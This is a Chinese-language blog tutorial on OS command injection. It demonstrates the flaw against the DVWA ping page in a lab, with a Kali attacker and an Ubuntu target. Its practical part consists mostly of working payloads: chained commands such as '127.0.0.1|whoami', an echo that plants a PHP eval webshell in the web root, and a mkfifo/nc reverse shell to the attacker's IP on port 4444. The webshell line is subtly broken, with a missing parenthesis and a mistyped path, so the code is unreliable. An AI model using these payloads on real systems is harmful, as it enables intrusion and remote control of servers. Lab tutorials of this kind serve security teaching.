安全漏洞从原理到实战--命令执行漏洞

01 命令执行漏洞
即黑客可以通过控制参数执行系统命令,形成原因是开发人员对用户输入参数安全检查不足从而导致的恶意命令执行。

02 常见的系统命令执行函数
Php命令执行函数eval()函数、assert()、preg_replace()、call_user_func()等。Java命令执行函数exec()函数等。

03 实战

  目标

        Ubuntu16.04

        DVWA系统

        IP:192.168.1.5

   攻击

       Kali Linux2020.2

       IP:192.168.1.10
   a、功能分析
       提示信息输入IP地址

在这里插入图片描述
输入IP地址,通过页面返回信息得知该功能是执行ping命令
在这里插入图片描述
b、漏洞分析
可能存在命令注入漏洞,构造参数如127.0.0.1|whoami
在这里插入图片描述
发现返回www-data、说明存在命令执行漏洞,且系统应该是Linux系统。使用127.0.0.1|uname验证系统。
在这里插入图片描述
返回系统是Linux系统,如果不返回任何信息说明是Windows系统。
&:除了最后一个cmd,前面的cmd均已后台方式静默执行,执行结果显示在终端上,个别的cmd错误不影响整个命令的执行,全部的cmd同时执行。
**&&:**从左到右顺序执行cmd,个别cmd错误不产生影响。
**|:**各个cmd同时在前台被执行,但是除最后的cmd之外,其余的执行结果不会被显示在终端上。
**||:**从左到右顺序执行cmd,只有左侧的cmd执行出错,右边的cmd才会被执行,同时一旦有cmd被成功执行,整个命令就会结束,返回终端。
漏洞利用
1、写入webshell
查看文件

127.0.0.1|ls /var/www/html/dvwa

在这里插入图片描述

127.0.0.1|echo "<?php @eval($_POST['123456'];?>">/var/ww/html/dvwa/1.php

在这里插入图片描述
写入成功
2、反弹shell

127.0.0.1|rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.10 4444 >/tmp/f

在这里插入图片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章